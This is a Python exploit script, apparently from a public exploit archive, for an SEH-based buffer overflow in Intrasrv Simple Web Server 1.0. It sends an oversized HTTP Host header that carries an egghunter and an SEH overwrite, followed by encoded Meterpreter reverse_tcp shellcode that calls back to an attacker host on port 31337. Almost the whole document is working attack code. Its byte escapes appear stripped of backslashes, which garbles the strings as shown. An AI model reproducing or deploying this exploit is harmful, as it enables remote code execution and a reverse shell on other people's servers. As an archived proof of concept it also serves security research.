
# Title : Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution
# Published : 2013-05-30
# Author :


# Exploit Title: Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF

# Date: 29.05.2013

# Exploit Author: xis_one@STM Solutions

# Vendor Homepage: http://www.leighb.com/intrasrv.htm

# Software Link: http://www.leighb.com/intrasrv.zip

# Version: 1.0

# Tested on: Windows XP SP3 Eng


# Movie: http://www.youtube.com/watch?v=NvCPYA6T9l0&feature=youtu.be



#!/usr/bin/python

import socket

import os

import sys



target="192.168.1.16"


#W00T

egghunter="x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x54x30x30x57x89xd7xafx75xeaxafx75xe7xffxe7" + "x90"*94

nseh="xEBx80x90x90"#jmp back do egghunter

seh="xddx97x40x00"  #0x004097dd, # pop eax # pop ebp # ret  - intrasrv.exe

crash = "x90"*1427 + egghunter + nseh + seh + "x90"*2439 #4000 bytes


#windows/meterpreter/reverse_tcp lhost=192.168.1.15 lport=31337 R | msfencode -t c -b 'x56' -e x86/alpha_mixed

shellcode = ("T00WT00W" +

"x89xe2xdaxcfxd9x72xf4x58x50x59x49x49x49x49x49"

"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"

"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"

"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"

"x59x6cx4bx58x4ex69x47x70x55x50x53x30x75x30x4e"

"x69x6bx55x64x71x78x52x73x54x4ex6bx51x42x64x70"

"x4ex6bx32x72x44x4cx6ex6bx62x72x45x44x6cx4bx30"

"x72x77x58x36x6fx38x37x32x6ax74x66x65x61x79x6f"

"x70x31x49x50x4cx6cx47x4cx63x51x51x6cx65x52x66"

"x4cx71x30x4bx71x48x4fx44x4dx55x51x6ax67x69x72"

"x4cx30x31x42x46x37x4cx4bx33x62x36x70x6ex6bx50"

"x42x75x6cx66x61x6ax70x6ex6bx47x30x51x68x4ex65"

"x69x50x42x54x71x5ax35x51x38x50x52x70x6cx4bx32"

"x68x67x68x4cx4bx71x48x35x70x77x71x39x43x58x63"

"x47x4cx47x39x4cx4bx37x44x4ex6bx65x51x79x46x30"

"x31x49x6fx46x51x59x50x4ex4cx59x51x4ax6fx64x4d"

"x36x61x5ax67x30x38x49x70x34x35x4ax54x55x53x61"

"x6dx39x68x47x4bx73x4dx37x54x32x55x59x72x63x68"

"x4cx4bx32x78x57x54x63x31x59x43x31x76x6cx4bx36"

"x6cx72x6bx4ex6bx33x68x65x4cx65x51x4ax73x6cx4b"

"x44x44x6cx4bx36x61x4ax70x6cx49x61x54x64x64x66"

"x44x61x4bx31x4bx65x31x52x79x51x4ax62x71x69x6f"

"x49x70x46x38x33x6fx53x6ax4ex6bx67x62x58x6bx4e"

"x66x53x6dx35x38x45x63x55x62x33x30x67x70x33x58"

"x53x47x64x33x54x72x31x4fx33x64x72x48x42x6cx31"

"x67x65x76x73x37x6bx4fx39x45x4dx68x5ax30x47x71"

"x37x70x77x70x74x69x59x54x62x74x42x70x42x48x64"

"x69x4bx30x30x6bx37x70x79x6fx58x55x32x70x42x70"

"x30x50x76x30x37x30x42x70x77x30x72x70x63x58x4b"

"x5ax34x4fx39x4fx79x70x79x6fx4ex35x6dx47x33x5a"

"x34x45x71x78x4bx70x6fx58x57x71x46x6fx42x48x54"

"x42x47x70x43x4ax72x49x4ex69x6ax46x31x7ax34x50"

"x31x46x70x57x73x58x6ex79x4fx55x63x44x35x31x6b"

"x4fx69x45x4dx55x6bx70x44x34x74x4cx6bx4fx50x4e"

"x67x78x71x65x4ax4cx63x58x58x70x38x35x49x32x51"

"x46x59x6fx6ex35x51x7ax63x30x70x6ax66x64x53x66"

"x50x57x45x38x44x42x39x49x68x48x43x6fx4bx4fx6e"

"x35x4cx4bx64x76x30x6ax73x70x33x58x73x30x66x70"

"x67x70x55x50x72x76x42x4ax67x70x75x38x63x68x69"

"x34x50x53x68x65x4bx4fx49x45x7ax33x71x43x73x5a"

"x57x70x73x66x61x43x42x77x50x68x63x32x6bx69x79"

"x58x31x4fx39x6fx4ax75x35x51x4fx33x36x49x38x46"

"x4cx45x59x66x42x55x4ax4cx4fx33x41x41")


buffer="GET / HTTP/1.1rn"

buffer+="Host: " + crash + "rn"

buffer+="Content-Type: application/x-www-form-urlencodedrn"

buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)rn"

buffer+="Content-Length: 1048580rnrn"

buffer+=shellcode

one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )

one.connect((target, 80))

one.send(buffer)

one.close()